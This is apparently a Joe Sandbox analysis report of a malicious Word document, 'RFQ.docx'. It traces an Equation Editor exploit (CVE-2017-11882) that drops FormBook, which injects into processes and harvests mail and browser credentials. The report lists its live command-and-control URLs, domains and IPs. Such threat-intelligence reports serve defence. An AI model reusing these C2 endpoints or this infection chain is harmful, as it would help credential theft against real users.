              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B1B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E2B1B1
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B134 sqlite3_bind_pointer,sqlite3_mutex_leave,11_2_61E2B134
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B103 sqlite3_bind_null,sqlite3_mutex_leave,11_2_61E2B103
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E10104 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,11_2_61E10104
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B0DD sqlite3_bind_int,sqlite3_bind_int64,11_2_61E2B0DD
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B08E sqlite3_bind_int64,sqlite3_mutex_leave,11_2_61E2B08E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B029 sqlite3_bind_double,sqlite3_mutex_leave,11_2_61E2B029
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B002 sqlite3_bind_text16,11_2_61E2B002
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B305 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E2B305
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E032E0 sqlite3_bind_parameter_name,11_2_61E032E0
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E032CE sqlite3_bind_parameter_count,11_2_61E032CE
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B21E sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,11_2_61E2B21E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E1346A sqlite3_bind_parameter_index,11_2_61E1346A
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E0FFB4 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,11_2_61E0FFB4
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF95 sqlite3_bind_text64,11_2_61E2AF95
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF6E sqlite3_bind_text,11_2_61E2AF6E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF27 sqlite3_bind_blob64,11_2_61E2AF27
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF00 sqlite3_mutex_leave,sqlite3_bind_blob,11_2_61E2AF00

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts33
              Exploitation for Client Execution              		11
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder              		11
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop Protocol1
              Browser Session Hijacking              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager16
              System Information Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder              		2
              Software Packing              		NTDS12
              Security Software Discovery              		Distributed Component Object Model1
              Email Collection              		5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              DLL Side-Loading              		LSA Secrets2
              Virtualization/Sandbox Evasion              		SSH1
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading              		Cached Domain Credentials2
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
              Process Injection              		Proc Filesystem1
              Remote System Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Rundll32              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1553493 Sample: RFQ.docx Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 71 Malicious sample detected (through community Yara rule) 2->71 73 Antivirus detection for dropped file 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 12 other signatures 2->77 13 WINWORD.EXE 338 20 2->13         started        process3 file4 49 C:\Users\user\AppData\Local\Temp\xwizard, MS-DOS 13->49 dropped 51 C:\Users\user\Desktop\~$RFQ.docx, data 13->51 dropped 53 C:\Users\user\Desktop\RFQ.docx (copy), Microsoft 13->53 dropped 55 ~WRF{AAAEB295-BE41...A-4A342AF27793}.tmp, Composite 13->55 dropped 16 EQNEDT32.EXE 47 13->16         started        process5 signatures6 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 16->69 19 cmd.exe 16->19         started        process7 process8 21 rundll32.exe 19->21         started        process9 23 rundll32.exe 2 21->23         started        dnsIp10 59 www.diced.jp 23->59 61 diced.jp 153.121.40.91, 443, 49161 SAKURA-BSAKURAInternetIncJP Japan 23->61 47 C:\Users\user\AppData\Local\Temp\wcC8DC.tmp, PE32 23->47 dropped 91 System process connects to network (likely due to code injection or exploit) 23->91 93 Found hidden mapped module (file has been removed from disk) 23->93 95 Maps a DLL or memory area into another process 23->95 97 Found direct / indirect Syscall (likely to bypass EDR) 23->97 28 ImagingDevices.exe 23->28         started        file11 signatures12 process13 signatures14 99 Maps a DLL or memory area into another process 28->99 31 mVjlVtpvDsvJ.exe 28->31 injected process15 signatures16 101 Maps a DLL or memory area into another process 31->101 103 Found direct / indirect Syscall (likely to bypass EDR) 31->103 34 convert.exe 2 20 31->34         started        process17 dnsIp18 57 www.sqlite.org 45.33.6.223, 49163, 80 LINODE-APLinodeLLCUS United States 34->57 45 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 34->45 dropped 79 Creates an undocumented autostart registry key 34->79 81 Tries to steal Mail credentials (via file / registry access) 34->81 83 Tries to harvest and steal browser information (history, passwords, etc) 34->83 85 2 other signatures 34->85 39 mVjlVtpvDsvJ.exe 34->39 injected 43 firefox.exe 34->43         started        file19 signatures20 process21 dnsIp22 63 www.swiftbyrte.xyz 39->63 65 www.swiftbyrte.xyz 209.74.64.59, 49172, 49173, 49174 MULTIBAND-NEWHOPEUS United States 39->65 67 6 other IPs or domains 39->67 87 Found direct / indirect Syscall (likely to bypass EDR) 39->87 signatures23 89 Performs DNS queries to domains with low reputation 63->89

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ.docx16%ReversingLabsDocument-RTF.Trojan.MintBrutel

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\wcC8DC.tmp100%AviraTR/Crypt.ZPACK.Gen
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp100%AviraEXP/CVE-2017-11882.Gen
              C:\Users\user\AppData\Local\Temp\wcC8DC.tmp100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\wcC8DC.tmp68%ReversingLabsWin32.Backdoor.FormBook
              C:\Users\user\AppData\Local\Temp\xwizard24%ReversingLabsWin64.Backdoor.MintBrutel

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://bf102.slafwi.cn/38.html0%Avira URL Cloudsafe
              http://www.danceonwater.net/bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wP0%Avira URL Cloudsafe
              https://dts.gnpge.com0%Avira URL Cloudsafe
              http://www.danceonwater.net/sk-logabpstatus.php?a=RXBFWi9PS1JhK2o0VE4rSFJRc2lNUXNGcGpJQlFMaUNXZ29mRW0%Avira URL Cloudsafe
              http://ocsp.entrust.net050%Avira URL Cloudsafe
              http://www.danceonwater.net/px.js?ch=10%Avira URL Cloudsafe
              http://www.maryneedskidneys.info0%Avira URL Cloudsafe
              http://www.swiftbyrte.xyz/4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wP0%Avira URL Cloudsafe
              http://www.foshape.top/1pj2/0%Avira URL Cloudsafe
              http://www.danceonwater.net/px.js?ch=20%Avira URL Cloudsafe
              http://www.swiftbyrte.xyz/4nss/0%Avira URL Cloudsafe
              http://www.foshape.top/1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wP0%Avira URL Cloudsafe
              http://www.maryneedskidneys.info/tqdg/0%Avira URL Cloudsafe
              http://www.danceonwater.net/bbvc/0%Avira URL Cloudsafe
              http://www.d63dm.top/5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIX0%Avira URL Cloudsafe
              https://www.diced.jp/~lizard581/cgi-bin/imageup/data/1424.jpg0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              d63dm.top
              		154.23.184.218
              		truefalse
                		unknown
                www.foshape.top
                		206.238.184.166
                		truefalse
                  		unknown
                  maryneedskidneys.info
                  		15.197.148.33
                  		truefalse
                    		unknown
                    diced.jp
                    		153.121.40.91
                    		truetrue
                      		unknown
                      www.swiftbyrte.xyz
                      		209.74.64.59
                      		truetrue
                        		unknown
                        www.danceonwater.net
                        		208.91.197.27
                        		truefalse
                          		unknown
                          www.sqlite.org
                          		45.33.6.223
                          		truefalse
                            		high
                            www.maryneedskidneys.info
                            		unknown
                            		unknownfalse
                              		unknown
                              www.d63dm.top
                              		unknown
                              		unknownfalse
                                		unknown
                                www.diced.jp
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.swiftbyrte.xyz/4nss/?S6g0i61=6+WoHn2deLk8NJlLXYXNnS+xy6y4IG2yMX4VldfHBIoEopHs/Hw0Y5um7kzlNPuKTbh4gzzb5ORm5rQz5MS/zlApmrlBhjwV83cLky4dFg4gLxZewVN2CP71ee4I&2Z94P=LzK44tdp_JPt28wPfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.foshape.top/1pj2/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.danceonwater.net/bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wPfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.foshape.top/1pj2/?S6g0i61=Q9HAAZkCTqKabe7K9gqmXFE+SKHCRVqPW1vmcslVAAVFIE4vmP8qeBByw9bQm+sf9dgpGu9sujYQB/6wq00OHtIuIS6zL5jH+2jz6veFJLP5dS32kbHd1AuYwep/&2Z94P=LzK44tdp_JPt28wPfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.d63dm.top/5lk2/?2Z94P=LzK44tdp_JPt28wP&S6g0i61=xN5yXASnf8rfOFDMZPS3Aw0q6F9xWSQOcuF1ZBKgOvcqlR+sQpCJKI8dzMuE4/uzfZcBpIlRLxNBArokm5VkqsBLYuSwN+GZ1JVyf5BEJyjaCGsWVIC6Oje00DIXfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.swiftbyrte.xyz/4nss/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.danceonwater.net/bbvc/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.maryneedskidneys.info/tqdg/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.diced.jp/~lizard581/cgi-bin/imageup/data/1424.jpgtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zipfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabconvert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                      		high
                                      http://aia.entrust.net/ovcs1-chain256.cer01xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                        		high
                                        https://dts.gnpge.commVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                          		high
                                          http://www.danceonwater.net/sk-logabpstatus.php?a=RXBFWi9PS1JhK2o0VE4rSFJRc2lNUXNGcGpJQlFMaUNXZ29mRWconvert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.entrust.net/server1.crl0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.entrust.net05xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.entrust.net03rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://bf102.slafwi.cn/38.htmlconvert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002F88000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.00000000039A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.danceonwater.net/px.js?ch=2convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ocsp.entrust.net00xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                                		high
                                                http://www.danceonwater.net/px.js?ch=1convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.maryneedskidneys.infomVjlVtpvDsvJ.exe, 0000000C.00000002.648430732.0000000000950000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                                  		high
                                                  https://support.google.com/chrome/?p=plugin_flashconvert.exe, 0000000B.00000003.541747443.0000000005C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchconvert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                                          		high
                                                          https://www.google.com/favicon.ico2-4C93H.11.drfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                                              		high
                                                              http://crl.entrust.net/ovcs1.crl0Jxwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                                                		high
                                                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.entrust.net/g2ca.crl0;xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                                                    		high
                                                                    http://ocsp.entrust.net0Drundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.entrust.net/rpa0xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drfalse
                                                                        		high
                                                                        https://secure.comodo.com/CPS0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                                                            		high
                                                                            http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sqlite.org/copyright.html.convert.exe, 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drfalse
                                                                                		high
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  15.197.148.33
                                                                                  		maryneedskidneys.infoUnited States
                                                                                  		7430TANDEMUSfalse
                                                                                  45.33.6.223
                                                                                  		www.sqlite.orgUnited States
                                                                                  		63949LINODE-APLinodeLLCUSfalse
                                                                                  209.74.64.59
                                                                                  		www.swiftbyrte.xyzUnited States
                                                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                                                  153.121.40.91
                                                                                  		diced.jpJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                  208.91.197.27
                                                                                  		www.danceonwater.netVirgin Islands (BRITISH)
                                                                                  		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                  154.23.184.218
                                                                                  		d63dm.topUnited States
                                                                                  		174COGENT-174USfalse
                                                                                  206.238.184.166
                                                                                  		www.foshape.topUnited States
                                                                                  		174COGENT-174USfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1553493
                                                                                  Start date and time:2024-11-11 10:02:11 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 8m 45s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                  Number of analysed new started processes analysed:16
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:RFQ.docx
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winDOCX@14/19@8/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 66.7%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 86%
                                                                                  • Number of executed functions: 49
                                                                                  • Number of non-executed functions: 223
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .docx
                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                  • Attach to Office via COM
                                                                                  • Scroll down
                                                                                  • Close Viewer

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                  • Execution Graph export aborted for target mVjlVtpvDsvJ.exe, PID 1780 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: RFQ.docx

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  04:03:20API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                  04:03:20API Interceptor27x Sleep call for process: EQNEDT32.EXE modified
                                                                                  04:04:28API Interceptor557x Sleep call for process: mVjlVtpvDsvJ.exe modified
                                                                                  04:04:33API Interceptor409650x Sleep call for process: convert.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  15.197.148.33SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.energyparks.net/k47i/
                                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.hyman.life/7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8
                                                                                  Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.ninesquare.games/42mc/
                                                                                  IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • www.jilifish.win/to3j/
                                                                                  ekte.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.childlesscatlady.today/0l08/
                                                                                  IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • www.jilifish.win/to3j/
                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.1clickw2.net/9bnb/
                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.ethetf.digital/m7sk/
                                                                                  LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.warriorsyndrome.net/yaso/
                                                                                  firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.148.33/
                                                                                  45.33.6.223SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                                                                                  Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                                                  SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                                                                                  IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                  ekte.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                  IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                  SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                  New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                                                  FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.sqlite.orgDocument.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                  • 45.33.6.223
                                                                                  kht87CiL7C.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                  • 45.33.6.223
                                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.33.6.223
                                                                                  KSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                  • 45.33.6.223
                                                                                  Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                  • 45.33.6.223
                                                                                  Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 45.33.6.223
                                                                                  SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
